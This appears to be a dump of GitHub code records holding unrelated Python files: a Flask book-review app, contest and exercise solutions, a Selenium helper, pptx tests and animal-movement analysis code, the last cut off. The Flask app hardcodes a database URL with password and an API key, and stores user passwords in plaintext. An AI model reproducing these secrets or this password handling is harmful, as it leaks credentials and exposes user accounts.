rounds)\n","repo_name":"DanVillalpando/Game-Theory","sub_path":"Prisoners_dilemma/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73495349530","text":"import os\n\nfrom flask import Flask, session, render_template, request, redirect, url_for, flash, message_flashed\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nimport requests\nfrom bs4 import BeautifulSoup\nimport xml.etree.ElementTree as ET\n\napp = Flask(__name__)\n\n# Check for environment variable\n\"\"\"if not (\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\"\"\"\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\nDATABASE_URL = \"postgres://ebpharyyuilerk:7189355070df9d885b5e3f7a1f24ad7518e9bc392dce3dd05e3f0f5ff8adca0c@ec2-54-75-246-118.eu-west-1.compute.amazonaws.com:5432/de6d4r723rdhcc\"\n# Set up database\nengine = create_engine(DATABASE_URL)\ndb = scoped_session(sessionmaker(bind=engine))\n\nclass Book():\n def __init__(self,isbn,title,author):\n self.isbn = isbn\n self.title = title\n self.author = author\n def __str__(self):\n return (f'{self.isbn} {self.author} {self.title}')\nclass Review():\n def __init__(self,username,comment,rating,isbn):\n self.username = username\n self.comment = comment\n self.rating = rating\n self.isbn = isbn\n\n@app.route(\"/\")\ndef index():\n if session.get('username') == None:\n flash('You have to login')\n return redirect(url_for('login'))\n\n username = session['username']\n books = db.execute(\"SELECT id, isbn, author, title FROM books\").fetchall()\n\n first_books = []\n count = 0\n for book in books:\n first_books.append(book)\n count+=1\n if count == 20:\n break\n\n return render_template('home.html',username=username,books=books,first_books=first_books)\n\n#Register\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n if request.method == 'GET':\n return render_template('register.html')\n\n elif request.method == 'POST':\n register_username = request.form.get('username')\n register_password = request.form.get('password')\n query = 'SELECT username FROM users WHERE username = :username'\n\n if db.execute(query, {'username': register_username}).first():\n flash('Username is already exist')\n return render_template('register.html')\n else:\n flash('Registration is successful')\n db.execute(\"INSERT INTO users (username, password) VALUES (:username, :password)\",\n {\"username\": register_username, \"password\": register_password})\n db.commit()\n return redirect(url_for('login'))\n\n#Login\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n if request.method == 'GET':\n return render_template('login.html')\n elif request.method == 'POST':\n login_username = request.form.get('username')\n login_password = request.form.get('password')\n session.clear()\n user = db.execute(\"SELECT username,password FROM users WHERE (username = :username AND password = :password)\",\n {'username':login_username,'password':login_password}).first()\n if user == None:\n print('Invalid user')\n flash('Wrong username or password')\n return render_template('login.html')\n else:\n session['username'] = login_username\n return redirect(url_for('index'))\n\n#Logout\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect('login')\n\n#Detail\n@app.route('/detail/',methods=['GET','POST'])\ndef detail(book_isbn):\n if session.get('username') == None:\n return redirect(url_for('login'))\n apikey = '9TI4CoND28j0LEXkBRApw'\n url2 = f'https://www.goodreads.com/book/isbn/{book_isbn}?key={apikey}'\n response = requests.get(url2)\n soup = BeautifulSoup(response.content, \"lxml-xml\")\n rating = soup.find('average_rating').text\n year = (soup.find('publication_year').text)\n rating_num = float(rating)\n username = session['username']\n book = db.execute(\"SELECT id, isbn, author, title FROM books WHERE isbn = :isbn \",{'isbn':book_isbn}).fetchone()\n\n reviews = db.execute(\"SELECT * FROM reviews WHERE isbn=:isbn\",{'isbn':book_isbn}).fetchall()\n user_check = db.execute(\"SELECT isbn FROM reviews WHERE username=:username AND isbn=:isbn\",{'username':username,'isbn':book_isbn}).fetchone()\n\n control = False\n if user_check == None:\n control = True\n\n review_list = []\n for i in range(len(reviews)):\n review = Review(reviews[i][0],reviews[i][1],reviews[i][2],reviews[0][3])\n review_list.append(review)\n\n if request.method == \"POST\":\n if control == False:\n flash(\"You can't review more than one\")\n else:\n review_username = username\n review_comment = request.form.get('review')\n review_rating = request.form.get('rating')\n\n db.execute(\"INSERT INTO reviews (username,comment,rating,isbn) VALUES (:username,:comment,:rating,:isbn)\",\n {\"username\":review_username,\"comment\":review_comment,\"rating\":review_rating,\"isbn\":book_isbn})\n db.commit()\n flash('Your review submitted')\n return render_template('detail.html', book=book, username=username, rating=rating,rating_num=rating_num, review_list=review_list)\n return render_template('detail.html',book=book,username=username,year=year,rating=rating,rating_num=rating_num,review_list=review_list)\n\n#Search\n@app.route('/search',methods=['GET','POST'])\ndef search():\n if request.method == 'POST':\n search_key = request.form.get('query')\n search = '%' + search_key + '%'\n #query = db.execute(\"SELECT * FROM books WHERE title LIKE :search \",{\"search\":search}).fetchall()\n query = db.execute(\"SELECT * FROM books WHERE (isbn LIKE :search OR title LIKE :search OR author LIKE :search)\",{\"search\":search}).fetchall()\n '''db.execute(\"SELECT isbn,title,author,year FROM books WHERE title LIKE :query OR author LIKE :query OR isbn LIKE :query\",\n {\"query\": query.title()}).fetchall()'''\n books = []\n for index,book in enumerate(query):\n book = Book(query[index][1], query[index][2], query[index][3])\n books.append(book)\n total_result = len(books)\n\n if session.get('username'):\n username = session['username']\n return render_template('results.html',books=books,username=username,total_result=total_result)\n\n else:\n flash('You have to sign in to search a book')\n return redirect('login')\n\n@app.route('/api/')\ndef api(isbn):\n apikey = '9TI4CoND28j0LEXkBRApw'\n book = db.execute(\"SELECT * FROM books WHERE isbn=:isbn\",{'isbn':isbn}).fetchone()\n try:\n url2 = f'https://www.goodreads.com/book/isbn/{isbn}?key={apikey}'\n response = requests.get(url2)\n soup = BeautifulSoup(response.content, \"lxml-xml\")\n rating = soup.find('average_rating').text\n year = (soup.find('publication_year').text)\n review_count = (soup.find('reviews_count').text)\n return render_template('api.html',book = book,rating=rating,review_count=review_count,year=year)\n except:\n return render_template('404.html')\n","repo_name":"asarm/BookReviewApp","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5121136696","text":"import sys\nfrom heapq import heappush, heappop\n\ndef is_dest(position):\n return position[0] == 0 \\\n or position[1] == 0 \\\n or position[0] == h-1 \\\n or position[1] == w-1\n\ndef solution(ship_dict, graph):\n prioriy_q = []\n seen = set()\n for i in range(h):\n for j in range(w):\n if graph[i][j] == 'E':\n heappush(prioriy_q, (0, (i, j)))\n seen.add((i,j))\n while prioriy_q:\n cost, position = heappop(prioriy_q)\n if is_dest(position):\n return cost\n x, y = (position[0]-1, position[1])\n if (x, y) not in seen:\n seen.add((x,y))\n heappush(prioriy_q, (cost + ship_dict[graph[x][y]], (x,y)))\n x, y = (position[0], position[1]+1)\n if (x, y) not in seen:\n seen.add((x, y))\n heappush(prioriy_q, (cost + ship_dict[graph[x][y]], (x,y)))\n x, y = (position[0]+1, position[1])\n if (x, y) not in seen:\n seen.add((x, y))\n heappush(prioriy_q, (cost + ship_dict[graph[x][y]], (x,y)))\n x, y = (position[0], position[1]-1)\n if (x, y) not in seen:\n seen.add((x, y))\n heappush(prioriy_q, (cost + ship_dict[graph[x][y]], (x,y)))\n del seen\n del prioriy_q\n\n\nif __name__ == '__main__':\n f = sys.stdin\n num_tests = int(f.readline())\n for _ in range(num_tests):\n k, w, h = map(int, f.readline().split(\" \"))\n ship_dict = {}\n for __ in range(k):\n ship_code, ship_num = f.readline().split(\" \")\n ship_dict[ship_code] = int(ship_num)\n\n graph = []\n for __ in range(h):\n graph.append(f.readline().strip())\n\n print(solution(ship_dict, graph))","repo_name":"leo-du/fsociety-notebook","sub_path":"baseline/pacnw_2013/E_Escape/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9658908458","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\nclass Singleton(type):\n def __init__(self, *args, **kwargs):\n self.__instance = None\n super().__init__(*args, **kwargs)\n\n def __call__(self, *args, **kwargs):\n if self.__instance is None:\n self.__instance = super().__call__(*args, **kwargs)\n return self.__instance\n else:\n return self.__instance\n\n\nclass SingletonWebDriver(metaclass=Singleton):\n __driver = None\n\n @classmethod\n def get_driver(cls, parameters=None):\n if cls.__driver is None:\n options = webdriver.ChromeOptions()\n if parameters is not None:\n for p in parameters:\n options.add_argument(p)\n cls.__driver = webdriver.Chrome(\n service=ChromeService(ChromeDriverManager().install()), options=options\n )\n return cls.__driver\n\n @classmethod\n def unassign_driver(cls):\n cls.__driver = None\n","repo_name":"KonradCe/a1qa_L1_task2","sub_path":"singleton_webdriver.py","file_name":"singleton_webdriver.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26726788905","text":"\"\"\"\nThis file is responsible for creating basic ncaa seeds and for creating the outcome 'result'\n\"\"\"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nfrom sklearn.linear_model import LogisticRegression\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import GridSearchCV\n\ndef seed_to_int(seed):\n\t#Get just the digits from the seeding. Return as int\n\ts_int = int(seed[1:3])\n\treturn s_int\n\n#data_dir = '../input/'\ndef make_seeds():\n\tprint(\"loading data..\")\n\tdf_seeds = pd.read_csv('data/DataFiles/NCAATourneySeeds.csv')\n\tdf_tour = pd.read_csv('data/DataFiles/NCAATourneyCompactResults.csv')\n\n\tdf_seeds['seed_int'] = df_seeds.Seed.apply(seed_to_int)\n\tdf_seeds.drop(labels=['Seed'], inplace=True, axis=1) # This is the string label\n\n\tdf_tour.drop(labels=['DayNum', 'WScore', 'LScore', 'WLoc', 'NumOT'], inplace=True, axis=1)\n\n\tprint(\"creating seeds...\")\n\tdf_winseeds = df_seeds.rename(columns={'TeamID':'WTeamID', 'seed_int':'WSeed'})\n\tdf_lossseeds = df_seeds.rename(columns={'TeamID':'LTeamID', 'seed_int':'LSeed'})\n\tdf_dummy = pd.merge(left=df_tour, right=df_winseeds, how='left', on=['Season', 'WTeamID'])\n\tdf_concat = pd.merge(left=df_dummy, right=df_lossseeds, on=['Season', 'LTeamID'])\n\tdf_concat['SeedDiff'] = df_concat.WSeed - df_concat.LSeed\n\n\tdf_wins = pd.DataFrame()\n\tdf_wins = df_concat[['Season', 'WTeamID', 'LTeamID', 'SeedDiff']]\n\tdf_wins['Result'] = 1\n\n\tdf_losses = pd.DataFrame()\n\tdf_losses = df_concat[['Season', 'WTeamID', 'LTeamID']]\n\tdf_losses['SeedDiff'] = -df_concat['SeedDiff']\n\tdf_losses['Result'] = 0\n\n\tdf_predictions = pd.concat((df_wins, df_losses))\n\tprint(\"done\")\n\treturn(df_predictions)\n","repo_name":"stefanjwojcik/mm","sub_path":"notebooks/make_seeds.py","file_name":"make_seeds.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30095752877","text":"\"\"\"\r\n\n\nIn **Digital Cipher** , encoding is done by the simple addition of numbers in\nthe key and the corresponding characters on a string input.\n\nCreate a function that takes two arguments; a positive integer and a string\nand returns an encoded list of integers as message.\n\nAssign a unique number to each letter of the alphabet.\n\n a b c d e f g h i j k l m\n 1 2 3 4 5 6 7 8 9 10 11 12 13\n n o p q r s t u v w x y z\n 14 15 16 17 18 19 20 21 22 23 24 25 26\n\nThere are some variations on the rules of encipherment. One version of the\ncipher rules are outlined below:\n\n message = \"scout\"\n key = 1939\n \n digital_cipher(message, key) ➞ [20, 12, 18, 30, 21]\n\nWrite the corresponding number against each character:\n\n s c o u t\n 19 3 15 21 20\n\nAdd to each obtained digit consecutive digits from the key:\n\n s c o u t\n 19 3 15 21 20\n + 1 9 3 9 1\n ---------------\n 20 12 18 30 21\n\nSee the below example for a better understanding:\n\n message = \"masterpiece\"\n key = 1939\n \n digital_cipher(message, key) ➞ [14, 10, 22, 29, 6, 27, 19, 18, 6, 12, 8]\n \n m a s t e r p i e c e\n 13 1 19 20 5 18 16 9 5 3 5\n + 1 9 3 9 1 9 3 9 1 9 3\n --------------------------------\n 14 10 22 29 6 27 19 18 6 12 8\n\n### Examples\n\n digital_cipher(\"scout\", 1939) ➞ [20, 12, 18, 30, 21]\n \n digital_cipher(\"mubashir\", 1990) ➞ [14, 30, 11, 1, 20, 17, 18, 18]\n \n digital_cipher(\"edabit\", 100) ➞ [6, 4, 1, 3, 9, 20]\n\n### Notes\n\nLiked this challenge ? Let's decode your encrypted version\n[here](https://edabit.com/challenge/pyDemMDspSSFdWsh4)!!!\n\n\"\"\"\r\n\ndef digital_cipher(message, key):\n num_lst = []\n key_str = str(key)\n key_lst = []\n key_mask = []\n az_dict = {}\n az_lst = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n # create a key list\n for k in key_str:\n key_lst.append(int(k))\n # create dict to map letters to numbers\n num = 1\n for i in range(len(az_lst)):\n az_dict[az_lst[i]] = num\n num += 1\n # get list of int's from message\n for i in message:\n num_lst.append(az_dict[i])\n # create a key of the proper length\n key_length = len(key_lst)\n m_length = len(num_lst)\n key_mod = m_length % key_length\n key_int = int((m_length - key_mod) / key_length)\n key_leftover = []\n for i in range(key_mod):\n key_leftover.append(key_lst[i])\n for i in range(key_int):\n key_mask = key_mask + key_lst\n key_mask = key_mask + key_leftover\n # add the key_mask to the num_lst and return it\n cipher = []\n val = 0\n count = 0\n for i in num_lst:\n val = num_lst[count] + key_mask[count]\n cipher.append(val)\n count += 1\n return cipher\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"WFmZesxp2GXQcT8PE_22.py","file_name":"WFmZesxp2GXQcT8PE_22.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25858373417","text":"\nimport pptx\nfrom pptx.enum.shapes import MSO_SHAPE\n\ndef test_add_animation_single_shape():\n presentation = Presentation('path/to/presentation.pptx')\n slide = presentation.slides[0]\n shape = slide.shapes[0]\n add_animation(slide, shape)\n assert len(shape.animations) == 1\n\ndef test_add_animation_group_shape():\n presentation = Presentation('path/to/presentation.pptx')\n slide = presentation.slides[0]\n group_shape = slide.shapes.add_group()\n shape_1 = group_shape.shapes.add_shape(MSO_SHAPE.RECTANGLE, 0, 0, 100, 100)\n shape_2 = group_shape.shapes.add_shape(MSO_SHAPE.OVAL, 100, 100, 200, 200)\n add_animation(slide, group_shape)\n assert len(shape_1.animations) == 1\n assert len(shape_2.animations) == 1\n","repo_name":"toddbenanzer/sandbox_utils","sub_path":"pptx_hierarchy_viz/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73742778332","text":"import numpy as np\nimport pandas as pd\nimport warnings\nfrom scipy.spatial import distance_matrix\nfrom scipy.spatial.distance import pdist, squareform\nimport tsfresh\nfrom shapely.geometry import Polygon\nimport matplotlib.pyplot as plt\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nfrom .utils import presence_3d\nfrom functools import reduce\nimport st_clustering as stc\nfrom tqdm import tqdm\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom pandas.api.types import is_numeric_dtype\n\nfrom .feature_extraction import *\nfrom scipy.spatial import Voronoi, voronoi_plot_2d, ConvexHull, convex_hull_plot_2d, Delaunay, delaunay_plot_2d\n\n\ndef get_trajectories(data_groups):\n \"\"\"\n Obtain trajectories out of a grouped dictionary with multiple ids.\n :param data_groups: Grouped dictionary by animal_id.\n :return: Grouped dictionary by animal id, containing tuples of positions in 2d coordinate system.\n \"\"\"\n\n # create new dictionary\n trajectories = {}\n for aid in data_groups.keys():\n # add dict item, holding x-y tuples for the trajectories of each animal id\n trajectories[aid] = list(\n zip(data_groups[aid][\"x\"], data_groups[aid][\"y\"]))\n return trajectories\n\n\ndef dtw_matrix(preprocessed_data, path=False, distance=euclidean):\n \"\"\"\n Obtain dynamic time warping amongst all trajectories from the grouped animal-records.\n :param preprocessed_data: pandas Dataframe containing the movement records.\n :param path: Boolean to specify if matrix of dtw-path gets returned as well.\n :param distance: Specify which distance measure to use. Default: \"euclidean\". (ex. Alternatives: pdist, minkowski)\n :return: pandas Dataframe with distances between trajectories.\n \"\"\"\n data_groups = grouping_data(preprocessed_data)\n\n # get trajectory-dictionary with local function\n trajectories = get_trajectories(data_groups)\n\n # create empty np array with size, depending on number of tracked animals\n distance_matr = np.empty(\n (len([*trajectories.keys()]), len([*trajectories.keys()])))\n\n # create empty np list-array for paths with size, depending on number of tracked animals\n path_matr = np.empty(\n (len([*trajectories.keys()]), len([*trajectories.keys()])), dtype=list)\n\n # double-iterate over obtained trajectory dict\n for aid in tqdm(range(len([*trajectories.keys()])),position=0, desc=\"Calculating dynamic time warping\"):\n for aid2 in range(len([*trajectories.keys()])):\n # fill np array field with euclidean distance of respective trajectories, same for path field\n distance_matr[aid][aid2], path_matr[aid][aid2] = fastdtw(\n trajectories[[*trajectories.keys()][aid]],\n trajectories[[*trajectories.keys()][aid2]],\n dist=distance)\n # generate pandas df from distance array\n distance_df = pd.DataFrame(data=distance_matr,\n index=[*trajectories.keys()],\n columns=[*trajectories.keys()])\n if path:\n return distance_df, path_matr\n else:\n return distance_df\n\ndef compute_centroid_direction(data, colname=\"centroid_direction\", group_output=False, only_centroid=True):\n \"\"\"\n Calculate the direction of the centroid. Calculates centroid, if not in input data.\n :param pd DataFrame: DataFrame with x/y positional data and animal_ids, optionally include centroid\n :param colname: Name of the column. Default: centroid_direction.\n :param group_output: Boolean, defines form of output. Default: Animal-Level.\n :param only_centroid: Boolean in case we just want to compute the centroids. Default: True.\n :return: pandas DataFrame with centroid direction included\n \"\"\"\n # Handle centroid not in data\n if \"x_centroid\" not in data.columns or \"y_centroid\" not in data.columns:\n warnings.warn(\n 'x_centroid or y_centroid not found in data. Calculating centroid...'\n )\n data = centroid_medoid_computation(data, only_centroid=only_centroid)\n\n # Group into animals\n dat = grouping_data(data)\n\n with tqdm(total=100, position=0, desc=\"Computing centroid direction\") as pbar:\n pbar.update(10) # because compute_direction starts at 10% due to its call in extract_features\n dat = compute_direction(dat,\n pbar,\n param_x=\"x_centroid\",\n param_y=\"y_centroid\",\n colname=colname)\n\n cen_direction = regrouping_data(dat)\n\n if group_output == False:\n return cen_direction\n\n else:\n pol = cen_direction\n return pol.loc[pol.animal_id == list(set(pol.animal_id))[0],\n ['time', colname]].reset_index(drop=True)\n\n\ndef get_heading_difference(preprocessed_data):\n \"\"\"\n Calculate the difference in between the animal's direction and the centroid's direction for each timestep.\n The difference is measured by the cosine similarity of the two direction vectors. The value range is from -1 to 1,\n with 1 meaning animal and centroid having the same direction while -1 meaning they have opposite directions.\n :param preprocessed_data: Pandas Dataframe containing preprocessed animal records.\n :return: Pandas Dataframe containing animal and centroid directions as well as the heading difference.\n \"\"\"\n if \"direction\" not in preprocessed_data.columns:\n preprocessed_data = extract_features(preprocessed_data)\n\n if \"x_centroid\" not in preprocessed_data.columns or \"y_centroid\" not in preprocessed_data.columns:\n preprocessed_data = centroid_medoid_computation(preprocessed_data)\n # Obtain the centroid positions for each timestep, group into dictionary\n\n animal_dir = grouping_data(preprocessed_data)\n\n # Get the directions for each centroid for each timestep\n with tqdm(total=100,position=0, desc=\"Calculating heading difference\") as pbar:\n pbar.update(10) # because the method compute_direction() assumes 10% are already filled\n cen_dir = compute_direction(animal_dir,\n pbar,\n param_x=\"x_centroid\",\n param_y=\"y_centroid\",\n colname=\"centroid_direction\")\n\n directions = regrouping_data(cen_dir)\n # calculate cosine similarity of the centroids and the animals direction vector\n cos_similarities = [cosine_similarity(np.array([directions['direction'][i]]), np.array([directions['centroid_direction'][i]]))[0][0] for i in range(0, len(directions[\\\n 'direction']))] # cosine similarity for direction vectors of animal and centroid\n directions['heading_difference'] = cos_similarities\n return directions\n\n\ndef compute_polarization(preprocessed_data, group_output=False):\n \"\"\"\n Compute the polarization of a group at all record timepoints.\n More info about the formula: Here: https://bit.ly/2xZ8uSI and Here: https://bit.ly/3aWfbDv. As the formula only takes angles as input,\n the polarization is calculated for 2d - Data by first calculating the direction angles of the different movers and afterwards by calculating the polarization.\n For 3-dimensional data for all two's-combinations of the three dimensions the polarization is calculated in the way described before for 2d-data,\n afterwards the mean of the three results is taken as result for the polarization.\n :param preprocessed_data: Pandas Dataframe with or without previously extracted features.\n :return: Pandas Dataframe, with extracted features along with a new \"polarization\" variable.\n \"\"\"\n\n def polarization(preprocessed_data, group_output):\n # convert to radians for polarization formula\n preprocessed_data['direction_angle'] = preprocessed_data['direction_angle'].apply(lambda x: math.radians(x))\n\n # Group by 'time'-\n data_time = preprocessed_data.groupby('time')\n\n # Dictionary to hold grouped data by 'time' attribute-\n data_groups_time = {}\n\n # Obtain polarization for each point in time\n for aid in data_time.groups.keys():\n data_groups_time[aid] = data_time.get_group(aid)\n data_groups_time[aid].reset_index(drop=True, inplace=True)\n data = (1 / len(data_groups_time[aid][\"direction_angle\"])) * np.sqrt(\n (sum(np.sin(data_groups_time[aid][\"direction_angle\"].astype(np.float64)))\n )**2 +\n (sum(np.cos(data_groups_time[aid][\"direction_angle\"].astype(np.float64)))\n )**2)\n\n data_groups_time[aid] = data_groups_time[aid].assign(polarization=data)\n\n # Regroup data into DataFrame\n polarization_data = regrouping_data(data_groups_time)\n\n # convert direction angle back to degrees\n polarization_data['direction_angle'] = polarization_data['direction_angle'].apply(lambda x: math.degrees(x))\n\n # If interested in fullstack output for each animal\n if group_output == False:\n return polarization_data\n\n # If only interested in group level output, return one line per timeslot\n else:\n pol = polarization_data\n return pol.loc[pol.animal_id == list(set(pol.animal_id))[0],\n ['time', 'polarization']].reset_index(drop=True)\n\n # Check if 3d\n if 'z' in preprocessed_data.columns:\n # if 3d calculate direction angle for all three two's-combinations of the three dimensions\n preprocessed_data = preprocessed_data.rename(columns={'z': 'zz'})\n preprocessed_data_1 = compute_direction_angle(preprocessed_data)\n preprocessed_data_2 = compute_direction_angle(preprocessed_data, param_x='x', param_y='zz')\n preprocessed_data_3 = compute_direction_angle(preprocessed_data, param_x='y', param_y='zz')\n polarizations = []\n # then calculate the polarization for each combination and take the mean as the final result\n for i in [preprocessed_data_1, preprocessed_data_2, preprocessed_data_3]:\n polarizations.append(polarization(i, group_output=group_output))\n data = [(polarizations[0]['polarization'][i] + polarizations[1]['polarization'][i] + polarizations[2]['polarization'][i])\n / 3 for i in range(len(polarizations[0]['polarization']))]\n polarization_data = polarizations[0]\n polarization_data = polarization_data.assign(polarization=data)\n return polarization_data\n\n # if data is 2d check if it already has direction angle calculated and afterwards calculate polarization\n else:\n if \"direction_angle\" not in preprocessed_data.columns:\n warnings.warn('calculating direction angle for first two dimensions, since not found in input!')\n preprocessed_data = compute_direction_angle(preprocessed_data)\n return polarization(preprocessed_data, group_output)\n else:\n return polarization(preprocessed_data, group_output)\n\n\n\ndef voronoi_volumes(points):\n \"\"\"\n Function to calculate area in a voronoi-diagram. Used in function below.\n :param points: Nested list, indicating points with coordinates.\n :return: Volume for each point, infinite if area is not closed to each direction (usually outmost points).\n \"\"\"\n v = Voronoi(points)\n vol = np.zeros(v.npoints)\n for i, reg_num in enumerate(v.point_region):\n indices = v.regions[reg_num]\n if -1 in indices: # some regions can be opened\n vol[i] = np.inf\n else:\n vol[i] = ConvexHull(v.vertices[indices]).volume\n return vol\n\n\ndef get_spatial_objects(preprocessed_data, group_output=False):\n \"\"\"\n Function to calculate convex hull, voronoi diagram and delaunay triangulation objects and also volumes of the first two objects.\n Please visit https://docs.scipy.org/doc/scipy-0.14.0/reference/tutorial/spatial.html for detailed documentation of spatial attributes.\n :param preprocessed_data: Pandas Df, containing x and y coordinates.\n :param group_output: Boolean, default: False, If true, one line per time capture for entire animal group.\n :return: DataFrame either for each animal or for group at each time, containing convex hull and voronoi diagram area as well as convex hull, voronoi diagram and delaunay triangulation object.\n \"\"\"\n\n data_time = preprocessed_data.groupby('time')\n\n # Dictionary to hold grouped data by 'time' attribute-\n data_groups_time = {}\n\n for aid in tqdm(data_time.groups.keys(),position=0, desc=\"Calculating spatial objects\"):\n data_groups_time[aid] = data_time.get_group(aid)\n data_groups_time[aid].reset_index(drop=True, inplace=True)\n\n if len(data_groups_time[aid]) >= 3: # spatial objects need minimum 3 points in timestamp\n # Obtain shape objects\n conv_hull_obj = ConvexHull(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n voronoi_obj = Voronoi(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n delaunay_obj = Delaunay(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n\n # Calculate area based on objects right above\n conv_hull_vol = conv_hull_obj.volume\n voronoi_vol = voronoi_volumes(data_groups_time[aid].loc[:, [\"x\", \"y\"]])\n\n # Assign shapes to dataframe\n data_groups_time[aid] = data_groups_time[aid].assign(\n convex_hull_object=conv_hull_obj,\n voronoi_object=voronoi_obj,\n delaunay_object=delaunay_obj)\n\n data_groups_time[aid] = data_groups_time[aid].assign(\n convex_hull_volume=conv_hull_vol,\n voronoi_volume=voronoi_vol,\n )\n\n # Regroup data into DataFrame\n out_data = regrouping_data(data_groups_time)\n\n if group_output == False:\n return out_data\n\n else:\n pol = out_data\n pol = pol.loc[pol.animal_id ==\n list(set(pol.animal_id))[0], :].reset_index(drop=True)\n return pol.loc[:,['time', 'convex_hull_object', 'voronoi_object','delaunay_object', 'convex_hull_volume','voronoi_volume']]\n\ndef get_group_data(preprocessed_data):\n \"\"\"\n Helper function to get all group data at one place.\n :param preprocessed_data: pandas DataFrame, containing preprocessed movement records.\n :return: pd DataFrame containing all relevant group variables\n \"\"\"\n movement = centroid_medoid_computation(preprocessed_data)\n # prepare for merge\n movement = movement.rename(\n columns={'distance_to_centroid': 'distance_centroid'})\n\n # Take subset from dataset above, focusing only on group-level\n group = movement.loc[\n movement.animal_id == list(set(movement.animal_id))[0],\n ['time', 'x_centroid', 'y_centroid', 'medoid']].reset_index(drop=True)\n\n # compute polarization\n pol = compute_polarization(preprocessed_data, group_output=True).fillna(0)\n\n # compute mean speed, acceleration and mean distance to centroid\n mov = group_movement(movement).fillna(0)\n\n # compute centroid direction\n cen_dir = compute_centroid_direction(movement, group_output=True).fillna(0)\n\n # merge computed values into group-dataframe\n data_frames = [group, pol, mov, cen_dir]\n group = reduce(\n lambda left, right: pd.merge(left, right, on=['time'], how='left'),\n data_frames)\n return group\n\n\ndef clustering(algorithm, data, **kwargs):\n \"\"\"\n Clustering of spatio-temporal data.\n :param algorithm: Choose between dbscan, hdbscan, agglomerative, kmeans, optics, spectral, affinitypropagation, birch.\n :param data: DataFrame to perform clustering on.\n :return: labels as numpy array where the label in the first position corresponds to the first row of the input data.\n \"\"\"\n if algorithm == 'dbscan':\n clusterer = stc.ST_DBSCAN(**kwargs)\n elif algorithm == 'hdbscan':\n clusterer = stc.ST_HDBSCAN(**kwargs)\n elif algorithm == 'agglomerative':\n clusterer = stc.ST_Agglomerative(**kwargs)\n #elif algorithm == 'kmeans':\n # clusterer = stc.ST_KMeans(**kwargs)\n elif algorithm == 'optics':\n clusterer = stc.ST_OPTICS(**kwargs)\n elif algorithm == 'spectral':\n clusterer = stc.ST_SpectralClustering(**kwargs)\n elif algorithm == 'affinitypropagation':\n clusterer = stc.ST_AffinityPropagation(**kwargs) \n #elif algorithm == 'birch':\n # clusterer = stc.ST_BIRCH(**kwargs)\n else:\n raise ValueError('Unknown algorithm. Choose between dbscan, hdbscan, agglomerative, optics, spectral, affinitypropagation.')\n\n if not is_numeric_dtype(data['time'][0]): # if time format not integer\n grouped_data = data.groupby('time')\n keys = []\n for key in grouped_data.groups.keys():\n keys.append(key)\n time_distance = keys[1] - keys[0]\n\n for i in range(1, len(keys)): # check if time is equidistant\n if keys[i] - keys[i - 1] != time_distance:\n warnings.warn('As difference between timestamps is not equidistant, clustering of this data is not supported by movekit at the moment.')\n return\n\n # convert time to integer\n time_values = np.array(data['time'])\n time_values = np.unique(time_values)\n indices = np.sort(time_values)\n converter = {}\n for i in range(len(time_values)):\n converter[indices[i]] = i\n data = data.replace({'time': converter})\n\n if presence_3d(data):\n data = data.loc[:, ['time','x','y','z']].values\n else:\n data = data.loc[:, ['time','x','y']].values\n\n clusterer.st_fit(data)\n return clusterer.labels\n \n \n\ndef clustering_with_splits(algorithm, data, frame_size, **kwargs):\n \"\"\"\n Clustering of spatio-temporal data.\n :param algorithm: Choose between dbscan, hdbscan, agglomerative, optics, spectral, affinitypropagation.\n :param data: DataFrame to perform clustering on.\n :param frame_size: the dataset is partitioned into frames and merged afterwards.\n :return: labels as numpy array where the label in the first position corresponds to the first row of the input data.\n \"\"\"\n if algorithm == 'dbscan':\n clusterer = stc.ST_DBSCAN(**kwargs)\n elif algorithm == 'hdbscan':\n clusterer = stc.ST_HDBSCAN(**kwargs)\n elif algorithm == 'agglomerative':\n clusterer = stc.ST_Agglomerative(**kwargs)\n #elif algorithm == 'kmeans':\n # clusterer = stc.ST_KMeans(**kwargs)\n elif algorithm == 'optics':\n clusterer = stc.ST_OPTICS(**kwargs)\n elif algorithm == 'spectral':\n clusterer = stc.ST_SpectralClustering(**kwargs)\n elif algorithm == 'affinitypropagation':\n clusterer = 